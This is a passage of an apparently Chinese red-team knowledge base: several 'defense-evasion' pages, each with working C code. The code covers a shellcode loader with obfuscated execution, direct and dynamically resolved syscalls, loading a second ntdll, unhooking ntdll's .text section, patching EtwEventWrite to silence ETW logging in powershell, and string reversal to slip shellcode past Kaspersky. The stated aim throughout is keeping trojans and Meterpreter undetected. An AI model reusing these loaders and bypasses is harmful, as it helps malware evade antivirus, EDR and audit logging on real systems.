 77 | "\x3e\x3e\x3e\x76\x53\x4d\x58\x3f\x76\x6c\x71\x73\x3e\x76\x71"
 78 | "\x32\x3e\x78\x76\x56\x7b\x72\x72\x2f\xd7\x96\x52\x3a\x0e\x97"
 79 | "\xff\x2f\xcc\x4c\x4d\x4f\x4c\xe1\xce\x2f\xde\x4e\xe1\x4b\x16"
 80 | "\x0c\x41\x2a\x1d";
 81 | 
 82 | void exec()
 83 | {
 84 |     ((void(*)(void)) & shellcode)();
 85 | }
 86 | 
 87 | int main(int, const char* [])
 88 | {
 89 |     OBFUSCATED_CALL0(exec);
 90 |     //exec();
 91 |     return 0;
 92 | }
 93 | 
 94 | ```
 95 | 
 96 | ![](../.gitbook/assets/image%20%28134%29.png)
 97 | 
 98 | ```text
 99 | msfvenom -p windows/messagebox -e x86/xor_dynamic -i 2 -f c
100 | ```
101 | 
102 | 查杀效果：
103 | 
104 | ![](../.gitbook/assets/image%20%28128%29.png)
105 | 
106 | ![](../.gitbook/assets/image%20%28132%29.png)
107 | 
108 | 对于这种被杀烂的编写方式还是有比较明显的免杀效果的。
109 | 
110 | github:[https://github.com/idiotc4t/ObfuscationStrings-new](https://github.com/idiotc4t/ObfuscationStrings-new)
111 | 
112 | ## LINKS
113 | 
114 | {% embed url="https://github.com/andrivet/ADVobfuscator" %}
115 | 
116 | 
117 | 
118 | 


--------------------------------------------------------------------------------
/defense-evasion/dynamic-get-syscallid.md:
--------------------------------------------------------------------------------
 1 | # 动态获取系统调用\(syscall\)号
 2 | 
 3 | ## 简介
 4 | 
 5 | 众所周知不同的系统版本，进入内核的系统调用号不尽相同，之前对手工重写函数的时候免不了硬编码调用号，这使得我们写出来的木马兼容性不是特别好，需要对不同的系统进行定制化处理。
 6 | 
 7 | 对系统调用不太了解的旁友请移步[通过重写ring3 API函数实现免杀](overwrite-winapi-bypassav.md)。
 8 | 
 9 | 这种技术是看到这篇[漏洞利用缓解part2](https://www.crowdstrike.com/blog/state-of-exploit-development-part-2/)的启发，在windows 1607版本后，PTE也进行了随机化基址处理。
10 | 
11 | ![](../.gitbook/assets/image%20%28168%29.png)
12 | 
13 | 但有某位神仙安全研究员在blackhat公开了通过nt!MiGetPteAddress函数中获取实例化的PTE\(可能形容不是很恰当\)，通过这种思路，我联想到同样可以应用于syscall，于是就有了这篇文章，不同于上述技术syscall id直接硬编码于ntdll.dll。
14 | 
15 | ## 思路
16 | 
17 | 1. 通过GetProcAddress获取ntdll内的函数。
18 | 2. 读取函数偏移0x04获取系统调用号
19 | 3. 编辑函数模板填入调用号
20 | 4. 编写函数指针对函数模板进行调用
21 | 
22 | ![](../.gitbook/assets/image%20%28165%29.png)
23 | 
24 | ## 代码
25 | 
26 | 不同于页表,ntdll也可以直接解析PE格式来获取调用号，由于我本人比较懒，这里只给出内存动态读取的demo。
27 | 
28 | ![](../.gitbook/assets/image%20%28166%29.png)
29 | 
30 | 实现效果。
31 | 
32 | ![](../.gitbook/assets/image%20%28164%29.png)
33 | 
34 | ```text
35 | #include <Windows.h>
36 | #include <stdio.h>
37 | #include <tchar.h>
38 | #pragma comment(linker, "/section:.data,RWE")//.data段可执行
39 | 
40 | CHAR FuncExample[] = {
41 | 	0x4c,0x8b,0xd1,			  //mov r10,rcx
42 | 	0xb8,0xb9,0x00,0x00,0x00, //mov eax,0B9h
43 | 	0x0f,0x05,				  //syscall
44 | 	0xc3					  //ret
45 | };
46 | 
47 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(//函数指针
48 | 	HANDLE ProcessHandle,
49 | 	PVOID* BaseAddress, 
50 | 	ULONG_PTR ZeroBits, 
51 | 	PSIZE_T RegionSize, 
52 | 	ULONG AllocationType, 
53 | 	ULONG Protect);
54 | 
55 | 
56 | DOUBLE GetAndSetSysCall(TCHAR* szFuncName) {
57 | 	DWORD SysCallid = 0;
58 | 	HMODULE hModule = GetModuleHandle(_T("ntdll.dll"));
59 | 	DWORD64 FuncAddr = (DWORD64)GetProcAddress(hModule, (LPCSTR)szFuncName);
60 | 	LPVOID CallAddr = (LPVOID)(FuncAddr + 4);
61 | 	ReadProcessMemory(GetCurrentProcess(), CallAddr, &SysCallid, 4, NULL);
62 | 	memcpy(FuncExample+4, (CHAR*)&SysCallid, 2);
63 | 	return (DOUBLE)SysCallid;
64 | }
65 | 
66 | int main() {
67 | 	LPVOID Address = NULL;
68 | 	SIZE_T uSize = 0x1000;
69 | 	DOUBLE call = GetAndSetSysCall((TCHAR*)"NtAllocateVirtualMemory");
70 | 	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)&FuncExample;
71 | 	NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
72 | 	return 0;
73 | 
74 | }
75 | ```
76 | 
77 | ## LINKS
78 | 
79 | {% embed url="https://www.crowdstrike.com/blog/state-of-exploit-development-part-2/" %}
80 | 
81 | {% embed url="https://j00ru.vexillium.org/syscalls/nt/64/" %}
82 | 
83 | 
84 | 
85 | 


--------------------------------------------------------------------------------
/defense-evasion/load-ntdll-too.md:
--------------------------------------------------------------------------------
  1 | # 载入第二个Ntdll绕Hook
  2 | 
  3 | ## 简介
  4 | 
  5 | 我不知道有没有人写过这个东西， 之前和我的亲兄弟[snowming](http://blog.leanote.com/post/snowming/a0366d1d01bf)师傅交流时回想起来用[CreateFileMapping-&gt;MapViewOfFile](../code-and-dll-process-injection/mapping-injection.md)以文件映射的形式打开，如果被打开文件时PE格式，那么这个文件会按照内存展开，那么我们猜想是不是这个被第二次载入内存的ntdll是不是就是一个干净的ntdll，能不能帮助我们绕过一些inline hook。
  6 | 
  7 | ## 流程
  8 | 
  9 | 1. 使用CreateFileMapping-&gt;MapViewOfFile映射一个ntdll
 10 | 2. 自己实现一个GetProcAddress函数
 11 | 3. 使用自写GetProcAddress函数获取nt函数
 12 | 4. do it
 13 | 
 14 | ## 调试
 15 | 
 16 | 把代码写出来之后windbg调了一下，发现如果没有挂钩，那么这个代码其实和原ntdll是一模一样的，在windbg里面会显示第二个ntdll。\(只是显示成ntdll\_xxx,在ldr链表里还是叫ntdll\)。
 17 | 
 18 | ![](../.gitbook/assets/image%20%28194%29.png)
 19 | 
 20 | ![](../.gitbook/assets/image%20%28197%29.png)
 21 | 
 22 | 如果使用windows api GetProcAddress函数获取函数地址的话会报错0126 找不到指定的模块。
 23 | 
 24 | ![](../.gitbook/assets/image%20%28192%29.png)
 25 | 
 26 | 具体分析过程参考开源的reactos项目的代码。
 27 | 
 28 | ![](../.gitbook/assets/image%20%28199%29.png)
 29 | 
 30 | ![](../.gitbook/assets/image%20%28200%29.png)
 31 | 
 32 | ![](../.gitbook/assets/image%20%28198%29.png)
 33 | 
 34 | ![](../.gitbook/assets/image%20%28203%29.png)
 35 | 
 36 | ![errorcode 126](../.gitbook/assets/image%20%28204%29.png)
 37 | 
 38 | ![](../.gitbook/assets/image%20%28202%29.png)
 39 | 
 40 | 但是如果我们直接自己编写一个GetProcAddress函数就可以获取到这个自己加载的ntdll内的函数地址并且执行成功。
 41 | 
 42 | ![](../.gitbook/assets/image%20%28195%29.png)
 43 | 
 44 | ## 代码
 45 | 
 46 | ```text
 47 | #include <Windows.h>
 48 | #include <stdio.h>
 49 | 
 50 | #define DEREF( name )*(UINT_PTR *)(name)
 51 | #define DEREF_64( name )*(DWORD64 *)(name)
 52 | #define DEREF_32( name )*(DWORD *)(name)
 53 | #define DEREF_16( name )*(WORD *)(name)
 54 | #define DEREF_8( name )*(BYTE *)(name)
 55 | 
 56 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(
 57 | 	HANDLE ProcessHandle,
 58 | 	PVOID* BaseAddress,
 59 | 	ULONG_PTR ZeroBits,
 60 | 	PSIZE_T RegionSize,
 61 | 	ULONG AllocationType,
 62 | 	ULONG Protect);
 63 | 
 64 | FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName)
 65 | {
 66 | 	UINT_PTR uiLibraryAddress = 0;
 67 | 	FARPROC fpResult = NULL;
 68 | 
 69 | 	if (hModule == NULL)
 70 | 		return NULL;
 71 | 	uiLibraryAddress = (UINT_PTR)hModule;
 72 | 
 73 | 	__try
 74 | 	{
 75 | 		UINT_PTR uiAddressArray = 0;
 76 | 		UINT_PTR uiNameArray = 0;
 77 | 		UINT_PTR uiNameOrdinals = 0;
 78 | 		PIMAGE_NT_HEADERS pNtHeaders = NULL;
 79 | 		PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
 80 | 		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
 81 | 		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
 82 | 		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
 83 | 		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(uiLibraryAddress + pDataDirectory->VirtualAddress);
 84 | 		uiAddressArray = (uiLibraryAddress + pExportDirectory->AddressOfFunctions);
 85 | 		uiNameArray = (uiLibraryAddress + pExportDirectory->AddressOfNames);
 86 | 		uiNameOrdinals = (uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals);
 87 | 		if (((DWORD)lpProcName & 0xFFFF0000) == 0x00000000)
 88 | 		{
 89 | 			uiAddressArray += ((IMAGE_ORDINAL((DWORD)lpProcName) - pExportDirectory->Base) * sizeof(DWORD));
 90 | 			fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));
 91 | 		}
 92 | 		else
 93 | 		{
 94 | 			DWORD dwCounter = pExportDirectory->NumberOfNames;
 95 | 			while (dwCounter--)
 96 | 			{
 97 | 				char* cpExportedFunctionName = (char*)(uiLibraryAddress + DEREF_32(uiNameArray));
 98 | 				if (strcmp(cpExportedFunctionName, lpProcName) == 0)
 99 | 				{
100 | 					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
101 | 					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));
102 | 
103 | 					break;
104 | 				}
105 | 				uiNameArray += sizeof(DWORD);
106 | 				uiNameOrdinals += sizeof(WORD);
107 | 			}
108 | 		}
109 | 	}
110 | 	__except (EXCEPTION_EXECUTE_HANDLER)
111 | 	{
112 | 		fpResult = NULL;
113 | 	}
114 | 
115 | 	return fpResult;
116 | }
117 | 
118 | 
119 | int main() {
120 | 
121 | 	HANDLE hNtdllfile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
122 | 	HANDLE hNtdllMapping = CreateFileMapping(hNtdllfile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
123 | 	LPVOID lpNtdllmaping = MapViewOfFile(hNtdllMapping, FILE_MAP_READ, 0, 0, 0);
124 | 
125 | 	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddressR((HMODULE)lpNtdllmaping, "NtAllocateVirtualMemory");
126 | 
127 | 	int err = GetLastError();
128 | 
129 | 	LPVOID Address = NULL;
130 | 	SIZE_T uSize = 0x1000;
131 | 
132 | 	NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
133 | 	
134 | 	
135 | 
136 | 	return 0;
137 | };
138 | ```
139 | 
140 | ## LINKS
141 | 
142 | {% embed url="http://blog.leanote.com/post/snowming/a0366d1d01bf" %}
143 | 
144 | {% embed url="https://github.com/stephenfewer/ReflectiveDLLInjection" %}
145 | 
146 | 
147 | 
148 | 


--------------------------------------------------------------------------------
/defense-evasion/memory-pacth-bypass-etw.md:
--------------------------------------------------------------------------------
  1 | # 基于内存补丁ETW的绕过
  2 | 
  3 | ## 简介
  4 | 
  5 | 通常在红队行动中，面临的最大挑战并不是诸如杀毒、EDR之类的防护软件，红队行动中工具&代码的杀毒绕过只是事前工作\(基本功\)，所以攻击者使用的工具&代码往往在本地就比较完备的完成了免杀工作，在这样的背景下，如何让工具尽可能少的留下痕迹就成为了红队成员首要解决的问题。
  6 | 
  7 | 在cobaltstrike中实现了在非托管进程中加载托管代码的功能模块execute-assembly，而这个功能因为操作系统提供的API（ ICLRMetaHost[、](https://www.21ct.cc/)ICLRRuntimeInfo、ICLRRuntimeHost）在实现上并不复杂，但是这并不影响它的实用性。
  8 | 
  9 | ## 技术原理
 10 | 
 11 | 对于检测CLR进行的操作\(托管进程\)一种比较好的方法就是通过Windows事件跟踪（ETW\),虽然该功能最早是为了调试和监控性能引入的，但是这并不妨碍它成为监控execute-assembly等功能的行为操作。
 12 | 
 13 | 如我们正常开启一个powershell\(属于托管进程\)，在进程加载过程中就会产生大量日志记录，我们可以通过processhacker，进行查看。
 14 | 
 15 | ![](../.gitbook/assets/image%20%28125%29.png)
 16 | 
 17 | 根据前人的研究结果，我们可以知道ETW是由用户空间ntdll.dll!EtwEventWrite发起的\(这里手动@xpn\)，这样我们对其绕过也能比较方便的实现。
 18 | 
 19 | > ### How does the CLR surface events via ETW? <a id="how-does-the-clr-surface-events-via-etw"></a>
 20 | >
 21 | > Hopefully by this point the goal is obvious, we need to stop ETW from reporting our malicious activity to defenders. To do this we first need to understand just how the CLR exposes its events via ETW.
 22 | >
 23 | > Let's take a look at `clr.dll` to try and see if we can spot the moment that an event is triggered. Loading the PDB and hunting for the `AssemblyDCStart_V1` symbol using Ghidra, we quickly land on the following method:
 24 | 
 25 | > ![](../.gitbook/assets/image%20%28116%29.png)
 26 | 
 27 | > Let's see if we can find the exact point that an event is generated reporting the Assembly load which we observed above with our ETW consumer. Dropping into WinDBG and setting a breakpoint on all `ntdll!EtwEventWrite` calls occurring after the `ModuleLoad` method above, we quickly discover the following where we can see our Assembly name of "test" is being sent:
 28 | 
 29 | > ![](../.gitbook/assets/image%20%28124%29.png)
 30 | 
 31 | > So this tells us 2 things. First, these ETW events are sent from userland, and second that these ETW events are issued from within a process that we control... And as we know, having a malicious process report that it is doing something malicious never ends well.
 32 | 
 33 | 根据XPN大佬的研究结果，我们尝试patch ntdll!EtwEventWrite来验证结论是否正确，这里使用x64dbg和powershell来验证。
 34 | 
 35 | 首先使用x64dbg创建一个powershell进程，这时x64dbg会在线程初始化前下一个断点。
 36 | 
 37 | 定位到ntdll!EtwEventWrite。
 38 | 
 39 | ![](../.gitbook/assets/image%20%28118%29.png)
 40 | 
 41 | 一般windows api默认使用stdcall\(x86\)调用约定，这里x64默认使用fastcall，即寄存器传参，被调用者清理堆栈，所以我们直接返回就好，以防万一我们确认一下，堆栈的平衡方式会决定我们的内存补丁写法\(这里之前看错了，把后面那个add rsp,58以为是函数内那个call的\)。
 42 | 
 43 | ![](../.gitbook/assets/image%20%28123%29.png)
 44 | 
 45 | 这时我们使用一起BypassAmsi的方式在函数开头直接返回。
 46 | 
 47 | ![](../.gitbook/assets/image%20%28119%29.png)
 48 | 
 49 | 在processhacker中查看clr日志。
 50 | 
 51 | ![](../.gitbook/assets/image%20%28120%29.png)
 52 | 
 53 | 我们发现现在无法读取到任何日志。
 54 | 
 55 | ## 代码
 56 | 
 57 | 代码的话拿AMSI的随便改改就行。
 58 | 
 59 | 由于ntdll在进程加载之初就已经导入，所以这里不需要短暂睡眠，直接挂起创建就行。
 60 | 
 61 | ```text
 62 | 
 63 | #include <Windows.h>
 64 | #include <stdio.h>
 65 | #include <Tlhelp32.h>
 66 | int main() {
 67 | 	STARTUPINFOA si = {0};
 68 | 	PROCESS_INFORMATION pi = { 0 };
 69 | 	si.cb = sizeof(si);
 70 | 
 71 | 	CreateProcessA(NULL, (LPSTR)"powershell -NoExit", NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
 72 | 
 73 | 	HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
 74 | 	LPVOID pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
 75 | 
 76 | 	//Sleep(500);
 77 | 
 78 | 	DWORD oldProtect;
 79 | 	char patch = 0xc3;
 80 | 
 81 | 	VirtualProtectEx(pi.hProcess, (LPVOID)pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
 82 | 	WriteProcessMemory(pi.hProcess, (LPVOID)pEtwEventWrite, &patch, sizeof(char),NULL);
 83 | 
 84 | 	VirtualProtectEx(pi.hProcess, (LPVOID)pEtwEventWrite, 1, oldProtect, NULL); 
 85 | 	ResumeThread(pi.hThread);
 86 | 	CloseHandle(pi.hProcess);
 87 | 	CloseHandle(pi.hThread);
 88 | 	//FreeLibrary(hNtdll);
 89 | 	return 0;
 90 | 
 91 | }
 92 | ```
 93 | 
 94 | ![](../.gitbook/assets/image%20%28117%29.png)
 95 | 
 96 | ## LINKS
 97 | 
 98 | {% embed url="https://blog.xpnsec.com/hiding-your-dotnet-etw/" %}
 99 | 
100 | 
101 | 
102 | 


--------------------------------------------------------------------------------
/defense-evasion/overwrite-winapi-bypassav.md:
--------------------------------------------------------------------------------
  1 | # 通过重写ring3 API函数实现免杀
  2 | 
  3 | > 这个是以前发在Tools的文章，不是我偷的！
  4 | 
  5 | > 在当前环境下，安全技术的防御能力逐渐变强，很多单纯的花式调用api也会被杀毒软件定义为恶意行为，同时杀毒软件也会通过hook用户层\(ring3\)函数的方式来捕捉api的调用，本文将介绍如何通过重写三环函数来实现杀毒软件的绕过。
  6 | 
  7 | ### 分析windowsAPI调用过程
  8 | 
  9 | 现在我们通过Process Monitor来观察一下Windows Api的调用过程，我们通过断点追踪的方式在函数调用前单独下一个断点，以便观察windows是如何调用api的。
 10 | 
 11 | ```text
 12 | #include <Windows.h>
 13 | 
 14 | 
 15 | VOID WINAPI Thread(LPVOID lpParam)
 16 | {
 17 |     MessageBoxW(0, 0, 0, 0);
 18 | }
 19 | 
 20 | int main() {
 21 | 
 22 |     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Thread, 0, 0, 0);
 23 | 
 24 |     return 0;
 25 | }
 26 | ```
 27 | 
 28 | ![](../.gitbook/assets/image-20191107163603543.png)
 29 | 
 30 | 我们发现createthread函数最终在进入内核前会调用ntdll.dll中的ntcreatethreadex函数，那我们是否能够直接调用该函数从而进行创建线程操作呢，我们接下来尝试一下。
 31 | 
 32 | ### 寻找函数原型
 33 | 
 34 | 在微软公开的文档内，我们找到函数原型和如下定义：
 35 | 
 36 | ```text
 37 | typedef struct _UNICODE_STRING {
 38 |     USHORT Length;
 39 |     USHORT MaximumLength;
 40 |     PWSTR  Buffer;
 41 | } UNICODE_STRING, * PUNICODE_STRING;
 42 | 
 43 | typedef struct _OBJECT_ATTRIBUTES {
 44 |     ULONG           Length;
 45 |     HANDLE          RootDirectory;
 46 |     PUNICODE_STRING ObjectName;
 47 |     ULONG           Attributes;
 48 |     PVOID           SecurityDescriptor;
 49 |     PVOID           SecurityQualityOfService;
 50 | } OBJECT_ATTRIBUTES,*POBJECT_ATTRIBUTES;
 51 | 
 52 | //ntdll.dll 内函数均未公开
 53 | typedef DWORD(WINAPI* pNtCreateThreadEx)
 54 | (
 55 |     PHANDLE ThreadHandle,
 56 |     ACCESS_MASK DesiredAccess,
 57 |     POBJECT_ATTRIBUTES ObjectAttributes,
 58 |     HANDLE ProcessHandle,
 59 |     LPTHREAD_START_ROUTINE lpStartAddress,
 60 |     LPVOID lpParameter,
 61 |     BOOL CreateSuspended,
 62 |     DWORD dwStackSize,
 63 |     DWORD dw1,
 64 |     DWORD dw2,
 65 |     LPVOID Unknown
 66 |     );
 67 | ```
 68 | 
 69 | 找到参数结构体和函数原型后，我们构造函数指针用于直接调用该函数。
 70 | 
 71 | 在此之前，我们需要先了解一下windows的系统底层设计，在dos系统年代，一个简单程序的报错就会引起整个系统的崩溃，这是因为系统运行在实模式\(real mode\)下，而在支持保护模式的cpu出现后，这个现象才得到缓解，保护模式引入了很多保护措施， 虚拟内存（Virtual Memory）和权限级别（Privilege Levels），就是其中最为典型的保护措施，在intel cpu设计时，一共设计了四个特权级别ring0-ring3，而在windows系统中，实际只使用两个特权级，ring0/ring3\(内核/用户\)。
 72 | 
 73 | ![](../.gitbook/assets/a.png)
 74 | 
 75 | 前面我们发现绝大多数系统api最终都会进入到系统内核去执行，在内核中的操作本文不做介绍，接下来我们尝试一下直接调用用户层最后层函数来规避杀毒软件的监控。
 76 | 
 77 | ```text
 78 | #include <Windows.h>
 79 | #include <stdio.h>
 80 | typedef NTSTATUS (NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
 81 | typedef NTSTATUS (NTAPI* pZwWriteVirtualMemory)(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
 82 | 
 83 | int main() {
 84 | 
 85 |     HMODULE hModule = LoadLibraryW(L"ntdll.dll");
 86 | 
 87 |     pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(hModule, "NtAllocateVirtualMemory");
 88 |     LPVOID Address = NULL;
 89 |     SIZE_T uSize = 0x1000;
 90 |     HANDLE hProcess = GetCurrentProcess();
 91 |     NTSTATUS status = NtAllocateVirtualMemory(hProcess, &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
 92 |     if (status != 0) {
 93 |        return FALSE;
 94 |     }
 95 |     char a[] = "hello world\n";
 96 |     WriteProcessMemory(hProcess, Address, a, sizeof(a), 0);
 97 | 
 98 | 
 99 |     return 0;
100 | }
101 | ```
102 | 
103 | ![](../.gitbook/assets/image-20191108093201207.png)
104 | 
105 | windows为了保证公开api的兼容性，所以对真正进入内核的函数进行了封装，以保证不同发行版的系统能用同样的代码调用同一个api，而真正进入内核的函数却不尽相同，这给编程开发人员便利的同时也方便了杀毒软件对此进行监控，假设更极端的情况，杀毒软件对用户层最下层\(ntdll.dll\)也进行了监控\(通常是inline hook\)，那我们要怎么规避这种检测呢？
106 | 
107 | ### 分析三环函数
108 | 
109 | 我们首先需要分析一下底层函数的实现。
110 | 
111 | ![](../.gitbook/assets/image-20191108094338812.png)
112 | 
113 | ![](../.gitbook/assets/image-20191108094417009.png)
114 | 
115 | 在我们分析了几个函数之后，我们发现，几乎所有的ntapi实现都惊人的一致，在参数传入后，把系统调用号\(在内核寻找真正的处理函数使用\)保存至eax内，之后判断cpu是否支持快速调用，如果支持使用syscall进入内核，反之使用中断门进入内核，这两种方式除了使用不同的堆栈切换方式和效率外并未有其他本质区别\(本文不做介绍\)，接下来我们的思路也比较清晰了，我们自己手工重写ring3函数，从而绕过杀毒软件的检测:
116 | 
117 | ![](../.gitbook/assets/image-20191108104747560.png)
118 | 
119 | 定义上图汇编文件，添加下图编译选项，添加参与编译，我们使用快速调用进入内核。
120 | 
121 | ![](../.gitbook/assets/image-20191108100755257.png)
122 | 
123 | ![](../.gitbook/assets/image-20191108100831250.png)
124 | 
125 | ```text
126 | #include <Windows.h>
127 | #include <stdio.h>
128 | 
129 | EXTERN_C NTSTATUS NTAPI NtAllocateVirtualMemoryProc(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
130 | typedef NTSTATUS (NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
131 | //typedef NTSTATUS (NTAPI* pZwWriteVirtualMemory)(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
132 | 
133 | int main() {
134 | 
135 | 
136 |     pNtAllocateVirtualMemory NtAllocateVirtualMemory = &NtAllocateVirtualMemoryProc;
137 |     LPVOID Address = NULL;
138 |     SIZE_T uSize = 0x1000;
139 |     HANDLE hProcess = GetCurrentProcess();
140 |     NTSTATUS status = NtAllocateVirtualMemory(hProcess, &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
141 |     if (status != 0) {
142 |        return FALSE;
143 |     }
144 |     char a[] = "hello world\n";
145 |     WriteProcessMemory(hProcess, Address, a, sizeof(a), 0);
146 | 
147 | 
148 |     return 0;
149 | }
150 | ```
151 | 
152 | ![](../.gitbook/assets/1573201562-1.jpg)
153 | 
154 | 这样我们就自己重写3环的api，因为是我们程序内定义的，所以杀毒软件\(用户态\)无法监控我们使用了api，下面就由大家自由发挥。  
155 | 
156 | 
157 | 


--------------------------------------------------------------------------------
/defense-evasion/reload-ntdll-.text-section.md:
--------------------------------------------------------------------------------
 1 | # 重新加载.text节拖钩
 2 | 
 3 | ## 简介
 4 | 
 5 | 以前简单介绍过[inline hook](../persistence/detous-inline-hook.md)，杀软会对ntdll进入内核的函数进行挂钩，从而实现检测和阻止，mantvydasb师傅已经对这种技术有详尽的解释，并没有什么特别复杂的操作，只是把ntdll的.text\(代码节\)进行了读取覆盖。
 6 | 
 7 | ![](../.gitbook/assets/image%20%28191%29.png)
 8 | 
 9 | ## 流程
10 | 
11 | 1. 读取ntdll进内存
12 | 2. 读取覆盖.text节
13 | 
14 | ## 代码
15 | 
16 | 代码是对mantvydasb师傅拙劣的模仿（直接抄233）。
17 | 
18 | ps:使用MapViewOfFile读取文件会直接在内存里展开。
19 | 
20 | ```text
21 | #include <Windows.h>
22 | #include <psapi.h>
23 | 
24 | int main()
25 | {
26 | 	MODULEINFO mInfo = { 0 };
27 | 	HANDLE hProcess = GetCurrentProcess();
28 | 
29 | 	//get address of ntdll in virtual memory 
30 | 	HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
31 | 	GetModuleInformation(hProcess, hNtdll, &mInfo, sizeof(mInfo));
32 | 	LPVOID lpNtdllbase = (LPVOID)mInfo.lpBaseOfDll;
33 | 	
34 | 	HANDLE hNtdllfile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
35 | 	HANDLE hNtdllMapping = CreateFileMapping(hNtdllfile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
36 | 	LPVOID lpNtdllmaping = MapViewOfFile(hNtdllMapping, FILE_MAP_READ, 0, 0, 0);
37 | 
38 | 	PIMAGE_DOS_HEADER pDosheader = (PIMAGE_DOS_HEADER)lpNtdllbase;
39 | 	PIMAGE_NT_HEADERS pNtheader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpNtdllbase + pDosheader->e_lfanew);
40 | 
41 | 	for (WORD i = 0; i < pNtheader->FileHeader.NumberOfSections; i++) {
42 | 		PIMAGE_SECTION_HEADER pSectionheader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pNtheader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
43 | 
44 | 		if (!strcmp((char*)pSectionheader->Name, (char*)".text")) {
45 | 			DWORD oldProtection = 0;
46 | 			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
47 | 			memcpy((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), (LPVOID)((DWORD_PTR)lpNtdllmaping + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize);
48 | 			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, oldProtection, NULL);
49 | 		}
50 | 	}
51 | 
52 | 	CloseHandle(hProcess);
53 | 	CloseHandle(hNtdllfile);
54 | 	CloseHandle(lpNtdllmaping);
55 | 	FreeLibrary(hNtdll);
56 | 
57 | 	return 0;
58 | }
59 | ```
60 | 
61 | ## LINKS
62 | 
63 | {% embed url="https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++" %}
64 | 
65 | 
66 | 
67 | 


--------------------------------------------------------------------------------
/defense-evasion/reverse-strings-bypass-av.md:
--------------------------------------------------------------------------------
 1 | # 反转字符串绕杀软
 2 | 
 3 | ## 简介
 4 | 
 5 | 我也不想写什么花里胡哨的东西，就让我水一篇吧。
 6 | 
 7 | 就继续延用这玩意把[SimpleShellcodeInject](https://github.com/DimopoulosElias/SimpleShellcodeInjector)，我还挺喜欢用这种shellcode传入方式的，让我们在这个基础上添加功能吧。
 8 | 
 9 | 为了节省我们的时间就随便加一个能自动化实现的shellcode混淆方式\(偷懒，手动狗头\)，就直接添加一个字符串翻转吧。
10 | 
11 | ## 思路
12 | 
13 | 直接python一行代码翻转字符串。
14 | 
15 | ![](../.gitbook/assets/image%20%28145%29.png)
16 | 
17 | 在加载器内翻转字符串。
18 | 
19 | ```text
20 |     int p = 0;
21 | 
22 |     for (int i = strlen(str) - 1; i >= 0; i--)
23 |     {
24 |         temp[p++] = str[i];
25 |     }
26 | ```
27 | 
28 | 然后执行老哥的ssi，这里遇到一个坑，tm的vc6根本没有malloc\(略略略\)。
29 | 
30 | 然后请出我们的卡巴斯基。
31 | 
32 | ![](../.gitbook/assets/image%20%28148%29.png)
33 | 
34 | 虽然我们古典主义脚本小子特别喜欢弹窗\(更多时候弹calc\)，这里我们再测一下Meterpreter。
35 | 
